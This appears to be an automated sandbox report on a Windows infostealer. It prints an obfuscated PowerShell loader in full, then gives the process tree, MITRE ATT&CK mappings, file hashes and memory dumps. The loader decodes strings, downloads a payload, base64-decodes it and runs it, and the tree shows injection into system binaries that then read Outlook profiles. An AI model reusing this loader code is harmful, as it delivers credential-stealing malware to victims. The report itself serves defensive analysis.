cyklrHu kotTen e=AgathdStadso Bellw nemn kriglStetsoRetinaSkelsdmonni&Antiqi SheddIndls= Tite1 Sept1 Bensb notfYVillauDem,bWDe urRA fgasLydig1platiL tpa_ PagawSkrmmOAtricpOrlo PFradrqspareqElegiqSe.tenOs meBHel e2tagdk1Vaads7UnmoriFamesq Induq BolszEgoceWAffalaScorpASeman5 Navn7 Supe6Fljet ';$Somberly=benignant 'R,con>Svine ';$Rewriting=benignant 'Sger.ISpeirE podoxMasse ';$argusblikkenes='Seeress';$skrvebetonerne = benignant 'dagpaeNaur.cDura.h arifoBlaap skrin%Mond,a,repppEkspepBlackdTransa intt Vella mona%A.tin\ detaPO hreoForeclantifyMeninpch orhAffalojo rnbMotoriLokuma nuti.rallecSvimlhScopor Cher Klokk&Isopa&tanks Amy oeSoltrcHoflehBruseoPr co Over,tFuppe ';Illuminate (benignant 'Aircr$SkrumgSanselRegeno Vamob h nka DemolSmelt:FogleJFortioTripuuInte rExpednInc ia K mnlPara.iTilsmsUnappewishbrConfee Naugn AricdErotoeT lst=Unm s(RyotscB,achmGlacid Varm Udpan/AnkomcPlump Decli$F ingspassikOrthor An tvWheyseNoncobD.tabeUndertRoul,oDemilnAcci eSuperr kelenExtraeSpild)St,rs ');Illuminate (benignant 'Farin$BetjegFelo.lFors oGevrkbWife aSubtrlTolkn:FilmeHAtwiroFolsomO yceoUltraioverroAdvaruOs,eosSammeiSc.weaVaricnEks.a=Bisam$Bit eS Modey Anc mmi impReperaBystyt Su ehTrevliCaphisMrkvri N genEgotrgU sti. bibls Ory p KraflSubmaigraphtDusse(Sashe$ Mo fSa chooL.nirm lsgrb arneeOverbrMurrslAdelsydanma)Maldi ');Illuminate (benignant 'Karto[Ursk NAtombeS ntit Ned .Alie.SFradre BlehrSyva,vMezaiiOvertcAlligeGrim,PWauchoWhangiP,olenper otSelvhMEgbata unden lskva an,egStosheBryggrImmor]Forha:kod i:Ti.reSDdirreUpflac Phenu Balsr PolyiPr,mit obbeyTeamaPKsendrReap,o randtMnt,eo paltcRett oZealolGless Usvig=Fore Subga[DipnoNEpiple WalltPorce.Afle,S BianeFrottcEternu .uggr.kmtei Allet atmyPens PUniqurForm oUdkketDiseno OligcCineaoEsocilVi ifT SkriyO.erbpWincheBeco.]Rembo:p.esb: ,ickTClauslPel isFildi1Firel2raadg ');$Sympathising=$Homoiousian[0];$Tewing= (benignant 'Hunde$Prelig ,ntilAntidoGenerBComp ATil,tl Ste,:,andsHtetraoVulcaMKrafto T,arNRestsYforfrMunitee poreSTrac = Kaf N B vaEIn erWSheet-Indt O ,odkBBedrijPo teENytaaCAnkehTAgter Hunchsthe.ryForhiSputtaTHave,eBug.pm Yeel.Muz rnByboee CabaTTalep.StormwTrkloE uverbIsog CSpeciLbl myi FaneEMerlon agrat');$Tewing+=$Journaliserende[1];Illuminate ($Tewing);Illuminate (benignant ' Fi a$HornbH FlatoCo ubmForhaoSupern Tegnyeyep mBlikdetnd msSkaal. apilH Evene hecka flstdafsineD pkorJord,sProse[ Misu$chasiETaccaxSprint ynsmeH poan Kel s alici HalooAmicanFi fia redlS.eri]Dawsp=Brneb$ Hie KSuperoHol glAsymmoTilesnHea.en UnhueMela fChadooSk dur F ulmothe aRorpitSi.hos Esco ');$Sensationelt=benignant 'Br,ge$ Mi rHFdr loB,awsmTagetoIsbryn MyteyCromlmcatcheForsaspriv,. SupeD GrinoAp stwFadernBefollFjer oGygesaArtildLeje,FOvermiEnervlUndgaeNati.( O,er$HysteSArea,ySpinamUnaffpNaetha e oit monghResbeiFemogsstr,pi HvornBravagStrik,perse$LrkerT Ramsa ecilCarbokSoliciSup rn Pe cgSvovl)Isdes ';$Talking=$Journaliserende[0];Illuminate (benignant ' aafe$HielaGS igelSh ieoD,monB Minea vet LB rgo:VldedtNou.eAEx anl Platl edbaSExacteBogfiSM lli=K pre(Thi,ut sek,ECourtSStemmtpurre-WritePDatosAReoleTU,ivah Bru Elvr$Hya,ot consaAtlanLSkolekRgto,iProgrnimmung.dluf)Lufth ');while (!$Tallses) {Illuminate (benignant 'Erst $traf,gAmo il ehebouns,obIgraiaChinqlMunds:MokkaHEnr,boSub bbStyggeadsti=Skriv$Acr.ntEmpowr .alcuKuf,yeEll t ') ;Illuminate $Sensationelt;Illuminate (benignant 'TermiSPhalatSkidtaHeterrMercitBusga- Bo mSFire lLiguseSpasmeLowripwight Spl 4 ,elt ');Illuminate (benignant ' Juba$SnydegMintmlNemo,oSub ubShil,a s ltlMicro:PhasiTG ecia issolAnnihlInseqsPrehyeD ynasKonkr=Unsta( all,TMalade.raves ntictFrugt- EighPYamaha tontS roghk ige Resil$HrderT Traba PolylArtikk luksi ResonUde ogdybtr)S,ive ') ;Illuminate (benignant 'Tren.$eftergAna.tlHenveoCluppbSva.taTermilUdvok:HaandESmr ecUns ic UnadlCopro=Udbrn$ De,tg Sr elHjtidoNabovbAds rateks lMenuk:OverwBSkyenu Gra n Is skZe ue+Idole+ Band%Unrue$I,tfaHInstroHummemNaunto AfskiDimoloAflveuSansesIglooiMedi.aSnd rnSinog.Budg cSalvio.lankuForgrnVestetIndav ') ;$Sympathising=$Homoiousian[$Eccl];}$Pariasaurus=286978;$drumheads=29373;Illuminate (benignant 'Strum$ ircugFugitl Elpro Skilbbant aUn,unlakkor:ma,gfFTsader ReveeOddsee verrlFeereo,lattaMinimdKn cke kulsdPsyke Venst=Jehus Pr,buG AppeeAngivtSpect-fagk C Z,dloCu icnOverptUnde eFlnsen onsatPe rl Stran$Iden,TsphenaBibetlBl etkSubcuiLvensnSkuffg Ty o ');Illuminate (benignant 'Te ri$OpkasgGlycol andioCuckqbEncepaBirkelSkema: Su,uDSyncheMonishChattysynondflyverDesigoTeolog Indhe gambnspecia CapttLame,eReforseksek Sigtn= eobj Skrif[ BephSGedebyUdspisK nemtJeaneeNightmBehan.FolkeC VedioBarben Paa v okose Unorrdiamat ump] Leuc:Uover: mhttFDa bcrtrimpo ,agemPhyllBGumwoa ntrsT.alpeRevan6Stjyl4 FuseS .roetDatabr Dan iAbonnn GrizgSolso( ndes$ForbiFseriorrddikeTele eKurvfl,likkoAsfreaLyco dKnatte Gidsds rec)Nedri ');Illuminate (benignant 'Stret$DrikkgIna,gl Chamo ThunbTapl aTi hel Flym: EvneMU pinoFodsvn AutoaMedbesZulubtimpreeCru,brUnfraiRun sa IntelskimmlStokry.demo myt,l=Pseud Shera[unadoSA timyPr ntsCaseltKuvereScreemTryki.R,gneTFir ee eillxcypritSk.ve.SallyE atinTortucUnderoMikr d Dea iL.tmenJellig Over]Indbi:Achen:Inve,ACome SPlutoCTankeISmi eI Pjat.AfledGTil ne PlustFalkoS.ontrtDilapr ntesiin ldn kvalgButan( Bunk$ ClifDTropaeSkaanh SoleyAmanudFyldnrUnderoSlaskgExotieCryptnAntigaoverpt Ved eSllersD ase)Skrum ');Illuminate (benignant 'Spist$HomoggFusspltilskoBoundbDurabaSnufflHplas:Ka muE FraglSpectoMavefrFor igWhik,lS,tsseSkattt InulsAfskr= Maes$SidesMIntrao enannCykelaStikpsUdfldtTow.leRestirMegatiUvanea.esorl Selvlarbe.yUndet.Wit,asSem nuFlag bCen tsAdenot AargrTanghiLangsnFortjgDupli( Ko v$MetodP Pr,ba vulrLngodiYndliaEnsbesM kniaSubdeu Ko fr AftruB agusPrisf, Akk $Tortud.verfr.purguR.dskmNozz.hFjerteAerifaStomad.rbejsTapn,) Vrdi ');Illuminate $Elorglets;"
      4⤵
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1448
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Polyphobia.chr && echo t"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4600
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        
        PID:1640
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        
        PID:4896
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        
        PID:4276
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        
        PID:2036
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        
        PID:4924
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        
        PID:5080
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        
        PID:60
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        
        PID:2224
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        
        PID:4320
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        
        PID:3152
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        
        PID:4684
    - - C:\Program Files (x86)\Internet Explorer\iexplore.exe
        
        "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
        5⤵
        
        PID:2604
    - - C:\Program Files (x86)\Internet Explorer\iexplore.exe
        
        "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
        5⤵
        
        PID:1572
    - - C:\Program Files (x86)\Internet Explorer\iexplore.exe
        
        "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
        5⤵
        
        PID:1800
    - - C:\Program Files (x86)\Internet Explorer\iexplore.exe
        
        "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
        5⤵
        
        PID:5104
    - - C:\Program Files (x86)\Internet Explorer\iexplore.exe
        
        "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
        5⤵
        
        PID:4916
    - - C:\Program Files (x86)\Internet Explorer\iexplore.exe
        
        "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
        5⤵
        
        PID:3776
    - - C:\Program Files (x86)\Internet Explorer\iexplore.exe
        
        "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
        5⤵
        
        PID:732
    - - C:\Program Files (x86)\Internet Explorer\iexplore.exe
        
        "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
        5⤵
        
        PID:3220
    - - C:\Program Files (x86)\Internet Explorer\iexplore.exe
        
        "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
        5⤵
        
        PID:4180
    - - C:\Program Files (x86)\Internet Explorer\iexplore.exe
        
        "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
        5⤵
        
        PID:4476
    - - C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
        
        "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
        5⤵
        Accesses Microsoft Outlook profiles
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:2352

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ilchz1vn.v5j.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-523280732-2327480845-3730041215-1000\0f5007522459c86e95ffcc62f32308f1_a5c5e2ae-85e3-447c-9e0b-c9a7b966d823

Filesize
46B

MD5
c07225d4e7d01d31042965f048728a0a

SHA1
69d70b340fd9f44c89adb9a2278df84faa9906b7

SHA256
8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

SHA512
23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-523280732-2327480845-3730041215-1000\0f5007522459c86e95ffcc62f32308f1_a5c5e2ae-85e3-447c-9e0b-c9a7b966d823

Filesize
46B

MD5
d898504a722bff1524134c6ab6a5eaa5

SHA1
e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

SHA256
878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

SHA512
26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

Download Submit
C:\Users\Admin\AppData\Roaming\Polyphobia.chr

Filesize
411KB

MD5
8cc3f41f8eb389e168dfefb6c8d3d5e4

SHA1
0d9b63c6903242e7b6a8320934109007693a6015

SHA256
a5ac06222217caee563724a3f4a6198f2db9c8faade6690ca4646a3208e1f4a2

SHA512
efd21158a60207dc440061b4d20a552a1f2d95d7c559994e3a052911006f25fdddfa6ff251e9e1658276f3f847c8b841ae9bbbac4846383d984209af715ac65c

Download Submit
memory/1448-35-0x0000000007750000-0x0000000007DCA000-memory.dmp

Filesize
6.5MB

Download
memory/1448-36-0x0000000006470000-0x000000000648A000-memory.dmp

Filesize
104KB

Download
memory/1448-43-0x0000000008930000-0x000000000B498000-memory.dmp

Filesize
43.4MB

Download
memory/1448-40-0x0000000008380000-0x0000000008924000-memory.dmp

Filesize
5.6MB

Download
memory/1448-18-0x00000000026E0000-0x0000000002716000-memory.dmp

Filesize
216KB

Download
memory/1448-19-0x00000000050F0000-0x0000000005718000-memory.dmp

Filesize
6.2MB

Download
memory/1448-20-0x0000000004FF0000-0x0000000005012000-memory.dmp

Filesize
136KB

Download
memory/1448-21-0x0000000005720000-0x0000000005786000-memory.dmp

Filesize
408KB

Download
memory/1448-22-0x0000000005790000-0x00000000057F6000-memory.dmp

Filesize
408KB

Download
memory/1448-32-0x0000000005880000-0x0000000005BD4000-memory.dmp

Filesize
3.3MB

Download
memory/1448-33-0x0000000005EC0000-0x0000000005EDE000-memory.dmp

Filesize
120KB

Download
memory/1448-34-0x0000000005F00000-0x0000000005F4C000-memory.dmp

Filesize
304KB

Download
memory/1448-39-0x0000000007100000-0x0000000007122000-memory.dmp

Filesize
136KB

Download
memory/1448-38-0x0000000007170000-0x0000000007206000-memory.dmp

Filesize
600KB

Download
memory/2328-16-0x00007FF9EF7C0000-0x00007FF9F0281000-memory.dmp

Filesize
10.8MB

Download
memory/2328-37-0x00007FF9EF7C0000-0x00007FF9F0281000-memory.dmp

Filesize
10.8MB

Download
memory/2328-0-0x00007FF9EF7C3000-0x00007FF9EF7C5000-memory.dmp

Filesize
8KB

Download
memory/2328-17-0x00007FF9EF7C0000-0x00007FF9F0281000-memory.dmp

Filesize
10.8MB

Download
memory/2328-12-0x000001DBD1610000-0x000001DBD1632000-memory.dmp

Filesize
136KB

Download
memory/2328-42-0x000001DBD1650000-0x000001DBD186C000-memory.dmp

Filesize
2.1MB

Download
memory/2328-15-0x00007FF9EF7C3000-0x00007FF9EF7C5000-memory.dmp

Filesize
8KB

Download
memory/2328-44-0x00007FF9EF7C0000-0x00007FF9F0281000-memory.dmp

Filesize
10.8MB

Download
memory/2328-63-0x000001DBD1650000-0x000001DBD186C000-memory.dmp

Filesize
2.1MB

Download
memory/2328-6-0x00007FF9EF7C0000-0x00007FF9F0281000-memory.dmp

Filesize
10.8MB

Download
memory/2328-7-0x00007FF9EF7C0000-0x00007FF9F0281000-memory.dmp

Filesize
10.8MB

Download
memory/2328-64-0x00007FF9EF7C0000-0x00007FF9F0281000-memory.dmp

Filesize
10.8MB

Download
memory/2352-45-0x0000000001200000-0x0000000003D68000-memory.dmp

Filesize
43.4MB

Download
memory/2352-60-0x0000000001200000-0x0000000003D68000-memory.dmp

Filesize
43.4MB

Download